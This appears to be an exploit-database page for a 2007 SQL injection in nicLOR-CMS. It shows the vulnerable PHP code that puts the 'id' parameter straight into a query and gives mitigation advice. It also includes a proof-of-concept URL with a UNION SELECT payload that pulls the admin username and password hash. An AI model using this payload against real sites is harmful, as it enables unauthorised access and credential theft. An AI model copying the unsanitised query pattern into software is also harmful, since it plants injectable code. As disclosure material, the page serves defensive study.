nicLOR-CMS SQL Injection Vulnerability

vendor:

nicLOR-CMS

by:

x0kster

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: nicLOR-CMS

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: niclor-cms

Metasploit:

Other Scripts:

Platforms Tested:

2007

nicLOR-CMS SQL Injection Vulnerability

The vulnerability allows an attacker to execute arbitrary SQL queries by manipulating the 'id' parameter in the 'sezione_news.php' script. By injecting SQL code, an attacker can retrieve sensitive information such as usernames and hashes.

Mitigation:

To mitigate the vulnerability, input validation should be implemented to ensure that user-supplied data is properly sanitized before being used in SQL queries. Additionally, the use of prepared statements or parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

Name            :  nicLOR-CMS SQL Injection Vulnerability.
Author          :  x0kster
Email           :  x0kster@gmail.com
Script Download :  http://www.niclor.net/prodotti/16-04-06-niclor_cms.zip
Date            :  21/12/2007

#SQL Injection in sezione_news.php

   <?php
   [...]
   $intSezioneID = $_GET['id'];
   [...]
   $strSQL = "SELECT articolo.intArticoloID, "
           . "[...]"        
           . " HAVING articolo.intSezioneID = $intSezioneID"
           . "[...]";
   [...]
   ?>

  So we can exploit the $intSezioneID and execute an sql injection.

  PoC:
  http://example.com/nicLOR-CMS/index.php?page=sezione&id=-1+union+select+1,concat(strUser,0x3a,strPass)+from+login/*

  And then we'll get the username and the hash of the admin.

# milw0rm.com [2007-12-21]